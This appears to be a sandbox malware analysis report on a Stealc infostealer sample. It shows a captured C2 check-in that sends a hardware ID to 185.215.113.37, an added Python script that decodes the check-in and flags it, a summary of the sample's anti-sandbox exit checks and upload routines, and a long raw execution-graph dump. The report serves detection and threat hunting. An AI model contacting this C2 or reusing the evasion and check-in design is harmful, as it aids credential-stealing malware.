Oct 11, 2024 01:49:59.923507929 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 11, 2024 01:49:59.923701048 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 11, 2024 01:50:02.624416113 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37

HTTP sessions with 185.215.113.37 (Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process):
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 2004 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data

Oct 11, 2024 01:49:58.962579966 CEST | 89 | OUT
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache

Oct 11, 2024 01:49:59.687046051 CEST | 203 | IN
    HTTP/1.1 200 OK
    Date: Thu, 10 Oct 2024 23:49:59 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

Oct 11, 2024 01:49:59.689609051 CEST | 412 | OUT
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 35 46 41 42 43 33 31 35 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a
    Data Ascii (CRLF line breaks restored; 211 bytes, matching Content-Length):
        ------GDGHJEHJJDAAAKEBGCFC
        Content-Disposition: form-data; name="hwid"

        F45FABC315104081907672
        ------GDGHJEHJJDAAAKEBGCFC
        Content-Disposition: form-data; name="build"

        doma
        ------GDGHJEHJJDAAAKEBGCFC--

Oct 11, 2024 01:49:59.923507929 CEST | 210 | IN
    HTTP/1.1 200 OK
    Date: Thu, 10 Oct 2024 23:49:59 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 8
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 59 6d 78 76 59 32 73 3d
    Data Ascii: YmxvY2s=

Note: the check-in sends two form fields, a hardware ID (hwid) and a build tag (build = "doma"), to a gate script named with 16 hex digits. The 8-byte reply YmxvY2s= is base64 for the string "block". With the process recorded as exited and no further request in this session, the collection and upload stages that would normally follow a check-in are not represented in this capture; the hwid and build values above are the fields a hunting rule can key on.
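The following script, added here as a worked example and not part of the Joe Sandbox report, parses the captured check-in exactly as it appears above: it splits the multipart body into its hwid and build fields, base64-decodes the C2 reply, and applies a simple detection heuristic. The two byte strings are copied verbatim from the report's "Data Raw" fields; the path pattern (a 16-hex-digit .php gate), the function names and the detection rule are this example's own assumptions, generalised from this single session.

```python
"""Decode and flag the Stealc check-in captured in the report above.

Added example, not part of the Joe Sandbox report. POST_BODY and REPLY are
the exact bytes from the report's "Data Raw" fields; BOUNDARY and the path
come from the captured headers. C2_PATH and the function names are this
example's assumptions, not something the report or the malware defines.
"""
import base64
import re

# POST body from the report (Content-Length: 211), copied from "Data Raw".
POST_BODY = bytes.fromhex(
    "2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 "
    "74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 35 46 41 42 43 33 31 "
    "35 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 "
    "4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f "
    "73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 "
    "6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a "
    "44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a"
)
# 8-byte reply body from the report, copied from "Data Raw".
REPLY = bytes.fromhex("59 6d 78 76 59 32 73 3d")

BOUNDARY = "----GDGHJEHJJDAAAKEBGCFC"          # from the captured Content-Type header
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY

# Assumption: the gate script is named with 16 lowercase hex digits, as in
# /e2b1563c6670f193.php above. Treat this as a tunable heuristic, not a fact.
C2_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")


def parse_multipart(body, boundary):
    """Return {field name: raw value bytes} for a multipart/form-data body."""
    delimiter = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":      # leading empty chunk, or the closing "--"
            continue
        headers, _, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]+)"', headers)
        if match:
            fields[match.group(1).decode()] = value
    return fields


def decode_reply(raw):
    """Decode the base64 text the C2 returns after the check-in."""
    return base64.b64decode(raw, validate=True)


def looks_like_stealc_checkin(method, path, content_type, body):
    """Heuristic: POST to /<16 hex>.php whose multipart body carries hwid and build."""
    if method != "POST" or not C2_PATH.match(path):
        return False
    match = re.search(r"boundary=([^;\s]+)", content_type)
    if not match:
        return False
    fields = parse_multipart(body, match.group(1))
    return {"hwid", "build"}.issubset(fields)


if __name__ == "__main__":
    fields = parse_multipart(POST_BODY, BOUNDARY)
    print("hwid :", fields["hwid"].decode())
    print("build:", fields["build"].decode())
    print("reply:", decode_reply(REPLY).decode())
    print("flagged:", looks_like_stealc_checkin(
        "POST", "/e2b1563c6670f193.php", CONTENT_TYPE, POST_BODY))
```

The hwid and build values are the stable, low-volume fields in this exchange; the boundary string is per-request and should not be used as an indicator. Decoding the reply matters for triage: a reply of "block" means the gate refused this client, so the absence of later traffic in a sandbox run says nothing about what the sample does on an accepted host.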
Target ID: 0
Start time: 19:49:55
Start date: 10/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xcb0000
File size: 1'825'280 bytes
MD5 hash: 9C7193E94B13D7380DCCC18B19A95158
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1664387616.0000000005670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 8.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 10.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 24

The rendered execution graph is exported here as a flat node/edge list. The call flow it records for file.exe (image base 0xcb0000) is summarised below using the function addresses and API labels from that list; the grouping into stages is an editorial reading of the edges, not a label from the sandbox.

1. Entry chain cc69f0 -> cb2260: a long run of calls to cb45c0 (RtlAllocateHeap, VirtualProtect), one per return site from cb2274 through cb268e.
2. cc9860 -> cc9750 (GetPEB), then cc9a93 with five LoadLibraryA calls and a series of GetProcAddress calls (cc9af4, cc9b16, cc9b4f, cc9b71, cc9b92): imports are resolved at runtime rather than through the import table.
3. cc6a00 -> cb11d0: a sequence of environment checks, each with a branch straight to ExitProcess:
   - cb11e8 -> ExitProcess at cb120f, otherwise cb1217
   - cb1160 GetSystemInfo -> ExitProcess at cb117c, otherwise cb1184
   - cb1110 GetCurrentProcess, VirtualAllocExNuma -> ExitProcess at cb1141, otherwise cb10a0 VirtualAlloc (with VirtualFree at cb10e2)
   - cc89b0 GlobalMemoryStatusEx, then __aulldiv at cb1249 -> ExitProcess at cb1292, otherwise cb129a
   - cc6770 GetUserDefaultLangID -> five separate ExitProcess branches (cc67a3, cc67ad, cc67b7, cc67c1, cc67cb), otherwise cc67d3
   - cb1190 -> cc78e0 / cc7850 (3 API calls each) -> ExitProcess at cb11c4, otherwise cb11cc
4. Host identification: cc7850 GetProcessHeap, RtlAllocateHeap, GetUserNameA; cc78e0 GetProcessHeap, RtlAllocateHeap, GetComputerNameA; strings assembled through cca9b0 (lstrlen, lstrcpy, lstrcat), cca8a0 and cca7a0 (lstrcpy).
5. cc6ac2 OpenEventA: one branch goes to cc6ae1 CreateEventA and continues at cc6b0c; the other (cc6af5) calls CloseHandle and Sleep, returns to cc6a89 and retries OpenEventA.
6. cc6920 GetSystemTime -> cc6820 (string build via cca9b0 / cca8a0) -> sscanf at cc6998 -> two SystemTimeToFileTime calls at cc69aa -> cc69ce, which either calls ExitProcess (cc69d8) or continues to cc5b10: a parsed date is compared against the current time and one outcome terminates the process.
7. cc5b10: string setup via cca740, cca820 (lstrlen, lstrcpy) and cc6430, then cb26a0 (a second long chain of cb45c0 calls, cb26b4 through cb45a9) and cc9c10 (bulk GetProcAddress resolution: cc9c20 with 43 API calls, cca036 through cca6a7).
8. cb1590 -> cb1670 -> cc5510: repeated StrCmpCA comparisons (cc5643, cc56a0, cc578a, cc5856, cc593f, cc5a0b) with Sleep at cc5a16, plus cc51f0 (20 API calls) and cc52c0 (25 API calls), returning to cc5cc3.
9. Collection and network setup: cc7500 GetWindowsDirectoryA; cb4880, cc17a0, cb5960 (34 API calls), cc1050, cc0d90, cc0f40, cc1a10; cb4fb0 GetProcessHeap, RtlAllocateHeap, InternetOpenA; cc0740, cc1170.
14522->14523 14524 cca7a0 lstrcpy 14523->14524 14525 cb15d9 14524->14525 14526 cca7a0 lstrcpy 14525->14526 14527 cb1663 14526->14527 14528 cc5510 14527->14528 14529 cc5521 14528->14529 14530 cca820 2 API calls 14529->14530 14531 cc552e 14530->14531 14532 cca820 2 API calls 14531->14532 14533 cc553b 14532->14533 14534 cca820 2 API calls 14533->14534 14535 cc5548 14534->14535 14536 cca740 lstrcpy 14535->14536 14537 cc5555 14536->14537 14538 cca740 lstrcpy 14537->14538 14539 cc5562 14538->14539 14540 cca740 lstrcpy 14539->14540 14541 cc556f 14540->14541 14542 cca740 lstrcpy 14541->14542 14582 cc557c 14542->14582 14543 cc5643 StrCmpCA 14543->14582 14544 cc56a0 StrCmpCA 14545 cc57dc 14544->14545 14544->14582 14546 cca8a0 lstrcpy 14545->14546 14547 cc57e8 14546->14547 14548 cca820 2 API calls 14547->14548 14550 cc57f6 14548->14550 14549 cca820 lstrlen lstrcpy 14549->14582 14552 cca820 2 API calls 14550->14552 14551 cc5856 StrCmpCA 14553 cc5991 14551->14553 14551->14582 14557 cc5805 14552->14557 14556 cca8a0 lstrcpy 14553->14556 14554 cca740 lstrcpy 14554->14582 14555 cca8a0 lstrcpy 14555->14582 14558 cc599d 14556->14558 14559 cb1670 lstrcpy 14557->14559 14560 cca820 2 API calls 14558->14560 14579 cc5811 14559->14579 14561 cc59ab 14560->14561 14564 cca820 2 API calls 14561->14564 14562 cc5a0b StrCmpCA 14565 cc5a28 14562->14565 14566 cc5a16 Sleep 14562->14566 14563 cca7a0 lstrcpy 14563->14582 14567 cc59ba 14564->14567 14568 cca8a0 lstrcpy 14565->14568 14566->14582 14570 cb1670 lstrcpy 14567->14570 14571 cc5a34 14568->14571 14569 cb1590 lstrcpy 14569->14582 14570->14579 14572 cca820 2 API calls 14571->14572 14573 cc5a43 14572->14573 14575 cca820 2 API calls 14573->14575 14574 cc52c0 25 API calls 14574->14582 14576 cc5a52 14575->14576 14578 cb1670 lstrcpy 14576->14578 14577 cc578a StrCmpCA 14577->14582 14578->14579 14579->13635 14580 cc593f StrCmpCA 14580->14582 14581 cc51f0 20 API calls 14581->14582 14582->14543 14582->14544 14582->14549 14582->14551 14582->14554 
14582->14555 14582->14562 14582->14563 14582->14569 14582->14574 14582->14577 14582->14580 14582->14581 14584 cc754c 14583->14584 14585 cc7553 GetVolumeInformationA 14583->14585 14584->14585 14586 cc7591 14585->14586 14587 cc75fc GetProcessHeap RtlAllocateHeap 14586->14587 14588 cc7628 wsprintfA 14587->14588 14589 cc7619 14587->14589 14590 cca740 lstrcpy 14588->14590 14591 cca740 lstrcpy 14589->14591 14592 cc5da7 14590->14592 14591->14592 14592->13656 14594 cca7a0 lstrcpy 14593->14594 14595 cb4899 14594->14595 15647 cb47b0 14595->15647 14597 cb48a5 14598 cca740 lstrcpy 14597->14598 14599 cb48d7 14598->14599 14600 cca740 lstrcpy 14599->14600 14601 cb48e4 14600->14601 14602 cca740 lstrcpy 14601->14602 14603 cb48f1 14602->14603 14604 cca740 lstrcpy 14603->14604 14605 cb48fe 14604->14605 14606 cca740 lstrcpy 14605->14606 14607 cb490b InternetOpenA StrCmpCA 14606->14607 14608 cb4944 14607->14608 14609 cb4ecb InternetCloseHandle 14608->14609 15653 cc8b60 14608->15653 14611 cb4ee8 14609->14611 15668 cb9ac0 CryptStringToBinaryA 14611->15668 14612 cb4963 15661 cca920 14612->15661 14616 cb4976 14617 cca8a0 lstrcpy 14616->14617 14622 cb497f 14617->14622 14618 cca820 2 API calls 14619 cb4f05 14618->14619 14620 cca9b0 4 API calls 14619->14620 14623 cb4f1b 14620->14623 14621 cb4f27 ctype 14624 cca7a0 lstrcpy 14621->14624 14626 cca9b0 4 API calls 14622->14626 14625 cca8a0 lstrcpy 14623->14625 14637 cb4f57 14624->14637 14625->14621 14627 cb49a9 14626->14627 14628 cca8a0 lstrcpy 14627->14628 14629 cb49b2 14628->14629 14630 cca9b0 4 API calls 14629->14630 14631 cb49d1 14630->14631 14632 cca8a0 lstrcpy 14631->14632 14633 cb49da 14632->14633 14634 cca920 3 API calls 14633->14634 14635 cb49f8 14634->14635 14636 cca8a0 lstrcpy 14635->14636 14638 cb4a01 14636->14638 14637->13659 14639 cca9b0 4 API calls 14638->14639 14640 cb4a20 14639->14640 14641 cca8a0 lstrcpy 14640->14641 14642 cb4a29 14641->14642 14643 cca9b0 4 API calls 14642->14643 14644 cb4a48 14643->14644 14645 cca8a0 lstrcpy 
14644->14645 14646 cb4a51 14645->14646 14647 cca9b0 4 API calls 14646->14647 14648 cb4a7d 14647->14648 14649 cca920 3 API calls 14648->14649 14650 cb4a84 14649->14650 14651 cca8a0 lstrcpy 14650->14651 14652 cb4a8d 14651->14652 14653 cb4aa3 InternetConnectA 14652->14653 14653->14609 14654 cb4ad3 HttpOpenRequestA 14653->14654 14656 cb4b28 14654->14656 14657 cb4ebe InternetCloseHandle 14654->14657 14658 cca9b0 4 API calls 14656->14658 14657->14609 14659 cb4b3c 14658->14659 14660 cca8a0 lstrcpy 14659->14660 14661 cb4b45 14660->14661 14662 cca920 3 API calls 14661->14662 14663 cb4b63 14662->14663 14664 cca8a0 lstrcpy 14663->14664 14665 cb4b6c 14664->14665 14666 cca9b0 4 API calls 14665->14666 14667 cb4b8b 14666->14667 14668 cca8a0 lstrcpy 14667->14668 14669 cb4b94 14668->14669 14670 cca9b0 4 API calls 14669->14670 14671 cb4bb5 14670->14671 14672 cca8a0 lstrcpy 14671->14672 14673 cb4bbe 14672->14673 14674 cca9b0 4 API calls 14673->14674 14675 cb4bde 14674->14675 14676 cca8a0 lstrcpy 14675->14676 14677 cb4be7 14676->14677 14678 cca9b0 4 API calls 14677->14678 14679 cb4c06 14678->14679 14680 cca8a0 lstrcpy 14679->14680 14681 cb4c0f 14680->14681 14682 cca920 3 API calls 14681->14682 14683 cb4c2d 14682->14683 14684 cca8a0 lstrcpy 14683->14684 14685 cb4c36 14684->14685 14686 cca9b0 4 API calls 14685->14686 14687 cb4c55 14686->14687 14688 cca8a0 lstrcpy 14687->14688 14689 cb4c5e 14688->14689 14690 cca9b0 4 API calls 14689->14690 14691 cb4c7d 14690->14691 14692 cca8a0 lstrcpy 14691->14692 14693 cb4c86 14692->14693 14694 cca920 3 API calls 14693->14694 14695 cb4ca4 14694->14695 14696 cca8a0 lstrcpy 14695->14696 14697 cb4cad 14696->14697 14698 cca9b0 4 API calls 14697->14698 14699 cb4ccc 14698->14699 14700 cca8a0 lstrcpy 14699->14700 14701 cb4cd5 14700->14701 14702 cca9b0 4 API calls 14701->14702 14703 cb4cf6 14702->14703 14704 cca8a0 lstrcpy 14703->14704 14705 cb4cff 14704->14705 14706 cca9b0 4 API calls 14705->14706 14707 cb4d1f 14706->14707 14708 cca8a0 lstrcpy 14707->14708 
14709 cb4d28 14708->14709 14710 cca9b0 4 API calls 14709->14710 14711 cb4d47 14710->14711 14712 cca8a0 lstrcpy 14711->14712 14713 cb4d50 14712->14713 14714 cca920 3 API calls 14713->14714 14715 cb4d6e 14714->14715 14716 cca8a0 lstrcpy 14715->14716 14717 cb4d77 14716->14717 14718 cca740 lstrcpy 14717->14718 14719 cb4d92 14718->14719 14720 cca920 3 API calls 14719->14720 14721 cb4db3 14720->14721 14722 cca920 3 API calls 14721->14722 14723 cb4dba 14722->14723 14724 cca8a0 lstrcpy 14723->14724 14725 cb4dc6 14724->14725 14726 cb4de7 lstrlen 14725->14726 14727 cb4dfa 14726->14727 14728 cb4e03 lstrlen 14727->14728 15667 ccaad0 14728->15667 14730 cb4e13 HttpSendRequestA 14731 cb4e32 InternetReadFile 14730->14731 14732 cb4e67 InternetCloseHandle 14731->14732 14737 cb4e5e 14731->14737 14735 cca800 14732->14735 14734 cca9b0 4 API calls 14734->14737 14735->14657 14736 cca8a0 lstrcpy 14736->14737 14737->14731 14737->14732 14737->14734 14737->14736 15674 ccaad0 14738->15674 14740 cc17c4 StrCmpCA 14741 cc17cf ExitProcess 14740->14741 14752 cc17d7 14740->14752 14742 cc19c2 14742->13661 14743 cc18ad StrCmpCA 14743->14752 14744 cc18cf StrCmpCA 14744->14752 14745 cc185d StrCmpCA 14745->14752 14746 cc187f StrCmpCA 14746->14752 14747 cc1970 StrCmpCA 14747->14752 14748 cc18f1 StrCmpCA 14748->14752 14749 cc1951 StrCmpCA 14749->14752 14750 cc1932 StrCmpCA 14750->14752 14751 cc1913 StrCmpCA 14751->14752 14752->14742 14752->14743 14752->14744 14752->14745 14752->14746 14752->14747 14752->14748 14752->14749 14752->14750 14752->14751 14753 cca820 lstrlen lstrcpy 14752->14753 14753->14752 14755 cca7a0 lstrcpy 14754->14755 14756 cb5979 14755->14756 14757 cb47b0 2 API calls 14756->14757 14758 cb5985 14757->14758 14759 cca740 lstrcpy 14758->14759 14760 cb59ba 14759->14760 14761 cca740 lstrcpy 14760->14761 14762 cb59c7 14761->14762 14763 cca740 lstrcpy 14762->14763 14764 cb59d4 14763->14764 14765 cca740 lstrcpy 14764->14765 14766 cb59e1 14765->14766 14767 cca740 lstrcpy 14766->14767 14768 cb59ee 
InternetOpenA StrCmpCA 14767->14768 14769 cb5a1d 14768->14769 14770 cb5fc3 InternetCloseHandle 14769->14770 14772 cc8b60 3 API calls 14769->14772 14771 cb5fe0 14770->14771 14775 cb9ac0 4 API calls 14771->14775 14773 cb5a3c 14772->14773 14774 cca920 3 API calls 14773->14774 14776 cb5a4f 14774->14776 14777 cb5fe6 14775->14777 14778 cca8a0 lstrcpy 14776->14778 14779 cca820 2 API calls 14777->14779 14781 cb601f ctype 14777->14781 14783 cb5a58 14778->14783 14780 cb5ffd 14779->14780 14782 cca9b0 4 API calls 14780->14782 14785 cca7a0 lstrcpy 14781->14785 14784 cb6013 14782->14784 14787 cca9b0 4 API calls 14783->14787 14786 cca8a0 lstrcpy 14784->14786 14795 cb604f 14785->14795 14786->14781 14788 cb5a82 14787->14788 14789 cca8a0 lstrcpy 14788->14789 14790 cb5a8b 14789->14790 14791 cca9b0 4 API calls 14790->14791 14792 cb5aaa 14791->14792 14793 cca8a0 lstrcpy 14792->14793 14794 cb5ab3 14793->14794 14796 cca920 3 API calls 14794->14796 14795->13667 14797 cb5ad1 14796->14797 14798 cca8a0 lstrcpy 14797->14798 14799 cb5ada 14798->14799 14800 cca9b0 4 API calls 14799->14800 14801 cb5af9 14800->14801 14802 cca8a0 lstrcpy 14801->14802 14803 cb5b02 14802->14803 14804 cca9b0 4 API calls 14803->14804 14805 cb5b21 14804->14805 14806 cca8a0 lstrcpy 14805->14806 14807 cb5b2a 14806->14807 14808 cca9b0 4 API calls 14807->14808 14809 cb5b56 14808->14809 14810 cca920 3 API calls 14809->14810 14811 cb5b5d 14810->14811 14812 cca8a0 lstrcpy 14811->14812 14813 cb5b66 14812->14813 14814 cb5b7c InternetConnectA 14813->14814 14814->14770 14815 cb5bac HttpOpenRequestA 14814->14815 14817 cb5c0b 14815->14817 14818 cb5fb6 InternetCloseHandle 14815->14818 14819 cca9b0 4 API calls 14817->14819 14818->14770 14820 cb5c1f 14819->14820 14821 cca8a0 lstrcpy 14820->14821 14822 cb5c28 14821->14822 14823 cca920 3 API calls 14822->14823 14824 cb5c46 14823->14824 14825 cca8a0 lstrcpy 14824->14825 14826 cb5c4f 14825->14826 14827 cca9b0 4 API calls 14826->14827 14828 cb5c6e 14827->14828 14829 cca8a0 lstrcpy 
14828->14829 14830 cb5c77 14829->14830 14831 cca9b0 4 API calls 14830->14831 14832 cb5c98 14831->14832 14833 cca8a0 lstrcpy 14832->14833 14834 cb5ca1 14833->14834 14835 cca9b0 4 API calls 14834->14835 14836 cb5cc1 14835->14836 14837 cca8a0 lstrcpy 14836->14837 14838 cb5cca 14837->14838 14839 cca9b0 4 API calls 14838->14839 14840 cb5ce9 14839->14840 14841 cca8a0 lstrcpy 14840->14841 14842 cb5cf2 14841->14842 14843 cca920 3 API calls 14842->14843 14844 cb5d10 14843->14844 14845 cca8a0 lstrcpy 14844->14845 14846 cb5d19 14845->14846 14847 cca9b0 4 API calls 14846->14847 14848 cb5d38 14847->14848 14849 cca8a0 lstrcpy 14848->14849 14850 cb5d41 14849->14850 14851 cca9b0 4 API calls 14850->14851 14852 cb5d60 14851->14852 14853 cca8a0 lstrcpy 14852->14853 14854 cb5d69 14853->14854 14855 cca920 3 API calls 14854->14855 14856 cb5d87 14855->14856 14857 cca8a0 lstrcpy 14856->14857 14858 cb5d90 14857->14858 14859 cca9b0 4 API calls 14858->14859 14860 cb5daf 14859->14860 14861 cca8a0 lstrcpy 14860->14861 14862 cb5db8 14861->14862 14863 cca9b0 4 API calls 14862->14863 14864 cb5dd9 14863->14864 14865 cca8a0 lstrcpy 14864->14865 14866 cb5de2 14865->14866 14867 cca9b0 4 API calls 14866->14867 14868 cb5e02 14867->14868 14869 cca8a0 lstrcpy 14868->14869 14870 cb5e0b 14869->14870 14871 cca9b0 4 API calls 14870->14871 14872 cb5e2a 14871->14872 14873 cca8a0 lstrcpy 14872->14873 14874 cb5e33 14873->14874 14875 cca920 3 API calls 14874->14875 14876 cb5e54 14875->14876 14877 cca8a0 lstrcpy 14876->14877 14878 cb5e5d 14877->14878 14879 cb5e70 lstrlen 14878->14879 15675 ccaad0 14879->15675 14881 cb5e81 lstrlen GetProcessHeap RtlAllocateHeap 15676 ccaad0 14881->15676 14883 cb5eae lstrlen 14884 cb5ebe 14883->14884 14885 cb5ed7 lstrlen 14884->14885 14886 cb5ee7 14885->14886 14887 cb5ef0 lstrlen 14886->14887 14888 cb5f03 14887->14888 14889 cb5f1a lstrlen 14888->14889 15677 ccaad0 14889->15677 14891 cb5f2a HttpSendRequestA 14892 cb5f35 InternetReadFile 14891->14892 14893 cb5f6a InternetCloseHandle 
14892->14893 14897 cb5f61 14892->14897 14893->14818 14895 cca9b0 4 API calls 14895->14897 14896 cca8a0 lstrcpy 14896->14897 14897->14892 14897->14893 14897->14895 14897->14896 14900 cc1077 14898->14900 14899 cc1151 14899->13669 14900->14899 14901 cca820 lstrlen lstrcpy 14900->14901 14901->14900 14904 cc0db7 14902->14904 14903 cc0f17 14903->13677 14904->14903 14905 cc0ea4 StrCmpCA 14904->14905 14906 cc0e27 StrCmpCA 14904->14906 14907 cc0e67 StrCmpCA 14904->14907 14908 cca820 lstrlen lstrcpy 14904->14908 14905->14904 14906->14904 14907->14904 14908->14904 14913 cc0f67 14909->14913 14910 cc1044 14910->13685 14911 cc0fb2 StrCmpCA 14911->14913 14912 cca820 lstrlen lstrcpy 14912->14913 14913->14910 14913->14911 14913->14912 14915 cca740 lstrcpy 14914->14915 14916 cc1a26 14915->14916 14917 cca9b0 4 API calls 14916->14917 14918 cc1a37 14917->14918 14919 cca8a0 lstrcpy 14918->14919 14920 cc1a40 14919->14920 14921 cca9b0 4 API calls 14920->14921 14922 cc1a5b 14921->14922 14923 cca8a0 lstrcpy 14922->14923 14924 cc1a64 14923->14924 14925 cca9b0 4 API calls 14924->14925 14926 cc1a7d 14925->14926 14927 cca8a0 lstrcpy 14926->14927 14928 cc1a86 14927->14928 14929 cca9b0 4 API calls 14928->14929 14930 cc1aa1 14929->14930 14931 cca8a0 lstrcpy 14930->14931 14932 cc1aaa 14931->14932 14933 cca9b0 4 API calls 14932->14933 14934 cc1ac3 14933->14934 14935 cca8a0 lstrcpy 14934->14935 14936 cc1acc 14935->14936 14937 cca9b0 4 API calls 14936->14937 14938 cc1ae7 14937->14938 14939 cca8a0 lstrcpy 14938->14939 14940 cc1af0 14939->14940 14941 cca9b0 4 API calls 14940->14941 14942 cc1b09 14941->14942 14943 cca8a0 lstrcpy 14942->14943 14944 cc1b12 14943->14944 14945 cca9b0 4 API calls 14944->14945 14946 cc1b2d 14945->14946 14947 cca8a0 lstrcpy 14946->14947 14948 cc1b36 14947->14948 14949 cca9b0 4 API calls 14948->14949 14950 cc1b4f 14949->14950 14951 cca8a0 lstrcpy 14950->14951 14952 cc1b58 14951->14952 14953 cca9b0 4 API calls 14952->14953 14954 cc1b76 14953->14954 14955 cca8a0 lstrcpy 
14954->14955 14956 cc1b7f 14955->14956 14957 cc7500 6 API calls 14956->14957 14958 cc1b96 14957->14958 14959 cca920 3 API calls 14958->14959 14960 cc1ba9 14959->14960 14961 cca8a0 lstrcpy 14960->14961 14962 cc1bb2 14961->14962 14963 cca9b0 4 API calls 14962->14963 14964 cc1bdc 14963->14964 14965 cca8a0 lstrcpy 14964->14965 14966 cc1be5 14965->14966 14967 cca9b0 4 API calls 14966->14967 14968 cc1c05 14967->14968 14969 cca8a0 lstrcpy 14968->14969 14970 cc1c0e 14969->14970 15678 cc7690 GetProcessHeap RtlAllocateHeap 14970->15678 14973 cca9b0 4 API calls 14974 cc1c2e 14973->14974 14975 cca8a0 lstrcpy 14974->14975 14976 cc1c37 14975->14976 14977 cca9b0 4 API calls 14976->14977 14978 cc1c56 14977->14978 14979 cca8a0 lstrcpy 14978->14979 14980 cc1c5f 14979->14980 14981 cca9b0 4 API calls 14980->14981 14982 cc1c80 14981->14982 14983 cca8a0 lstrcpy 14982->14983 14984 cc1c89 14983->14984 15685 cc77c0 GetCurrentProcess IsWow64Process 14984->15685 14987 cca9b0 4 API calls 14988 cc1ca9 14987->14988 14989 cca8a0 lstrcpy 14988->14989 14990 cc1cb2 14989->14990 14991 cca9b0 4 API calls 14990->14991 14992 cc1cd1 14991->14992 14993 cca8a0 lstrcpy 14992->14993 14994 cc1cda 14993->14994 14995 cca9b0 4 API calls 14994->14995 14996 cc1cfb 14995->14996 14997 cca8a0 lstrcpy 14996->14997 14998 cc1d04 14997->14998 14999 cc7850 3 API calls 14998->14999 15000 cc1d14 14999->15000 15001 cca9b0 4 API calls 15000->15001 15002 cc1d24 15001->15002 15003 cca8a0 lstrcpy 15002->15003 15004 cc1d2d 15003->15004 15005 cca9b0 4 API calls 15004->15005 15006 cc1d4c 15005->15006 15007 cca8a0 lstrcpy 15006->15007 15008 cc1d55 15007->15008 15009 cca9b0 4 API calls 15008->15009 15010 cc1d75 15009->15010 15011 cca8a0 lstrcpy 15010->15011 15012 cc1d7e 15011->15012 15013 cc78e0 3 API calls 15012->15013 15014 cc1d8e 15013->15014 15015 cca9b0 4 API calls 15014->15015 15016 cc1d9e 15015->15016 15017 cca8a0 lstrcpy 15016->15017 15018 cc1da7 15017->15018 15019 cca9b0 4 API calls 15018->15019 15020 cc1dc6 15019->15020 
